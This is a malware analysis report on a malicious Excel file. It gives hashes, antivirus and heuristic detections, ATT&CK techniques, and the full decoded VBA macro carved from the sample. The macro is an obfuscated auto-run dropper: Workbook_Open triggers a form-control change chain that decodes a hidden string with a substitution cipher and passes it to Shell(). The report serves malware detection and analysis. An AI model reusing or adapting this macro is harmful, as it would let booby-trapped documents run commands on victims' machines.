Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 b24f811c6f7a930e…

MALICIOUS

Office (OLE)

56.5 KB Created: 2018-09-24 09:52:31 Authoring application: Microsoft Excel First seen: 2019-11-20
MD5: 5f4780a6b70dae6498c7c422e401c32e SHA-1: a38b606162ac0fa6726b895a1dd1704eb0588c7f SHA-256: b24f811c6f7a930e78d3769c39f95d899b089ac4b805f3654b37922b41c6a233
222 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The file is an Excel document containing a Workbook_Open VBA macro that utilizes the Shell() function. This indicates an attempt to execute arbitrary commands, likely to download and run a secondary malicious payload. The ClamAV detection and heuristic firings strongly suggest malicious intent, but the exact payload and family could not be determined from the provided evidence.

Heuristics 6

  • ClamAV: Doc.Trojan.Agent-6922904-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.Agent-6922904-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.day.com/dam/1.0 In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/In document text (OLE body)
    • http://purl.org/dc/elements/1.1/In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 3822 bytes
SHA-256: 1accef75a0e4e3e7b85c9af8a6baa76e0805cce41dbbe9beafae06a3000767bb
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Sub Workbook_Open()
a = "ansi"
ANSI a
a = ""
End Sub


Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "mortem"
Attribute VB_Base = "0{1263B87D-D46D-45D0-8BE9-E60BB29F77AD}{2C6B8D23-40BE-49D6-81EE-9D7191B1EC0D}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False


Private Sub kill_Change()
regression = mortem.kill
more = 22
more = 94
more = 25
more = 31
more = 98
more = 12
more = 92
more = 8
more = 94
more = 80
more = 22
more = 62
more = 19
more = 41
more = 91
more = 85
more = 48
more = 69
more = 18
more = 40
more = 53
more = 26
more = 92
more = 33
more = 25
more = 3
more = 43
more = 46
more = 56
more = 21
more = 77
more = 61
more = 83
more = 88
more = 42
more = 57
more = 55
more = 18
more = 99
more = 76
more = 55
more = 62
more = 99
more = 41
more = 9
more = 18
more = 100
more = 100
more = 34
more = 9
Shell regression, 0
End Sub

Private Sub distributed_Change()
parameter
End Sub

Attribute VB_Name = "SIGSTKSZ"
Public Sub parameter()
mortem.errmsg = all(mortem.lparam)
mortem.kill = mortem.errmsg
End Sub

Attribute VB_Name = "headers"
Function gret(a1, a2)
gret = Right(Left(a1, s2), 1)
End Function

Function all(existing)
under = ""
Alert = 1
hopefully Alert, under, existing
all = under
End Function

Function hopefully(ByRef exceptionOutput, ByRef ExceptionInformation, guess)
performance = Len(guess)
If exceptionOutput <= performance Then
ExceptionInformation = ExceptionInformation + permissions(list(Right(Left(guess, exceptionOutput), 1)), 4)
exceptionOutput = exceptionOutput + 1
hopefully exceptionOutput, ExceptionInformation, guess
End If
End Function

Function permissions(CONTEXT, And1)
If CONTEXT - And1 < 1 Then
permissions = Right(Left(mortem.errors1, Len(mortem.errors1) + CONTEXT - And1), 1)
Else
permissions = Right(Left(mortem.errors1, CONTEXT - And1), 1)
End If
End Function

Function list(GUI)
Any1 = 1
something = 1
information Any1, something, GUI
list = something
End Function
  
Function information(ByRef Any1, ByRef something, GUI)
fpUnDecorateSymbolName = mortem.errors1
performance = Len(fpUnDecorateSymbolName)
If Any1 < performance Then
    If GUI <> Right(Left(fpUnDecorateSymbolName, Any1), 1) Then
    Any1 = Any1 + 1
    information Any1, something, GUI
    Else
    something = Any1
    End If
End If
End Function

Attribute VB_Name = "loop2"
Public Sub ANSI(settings)
mortem.distributed = settings
End Sub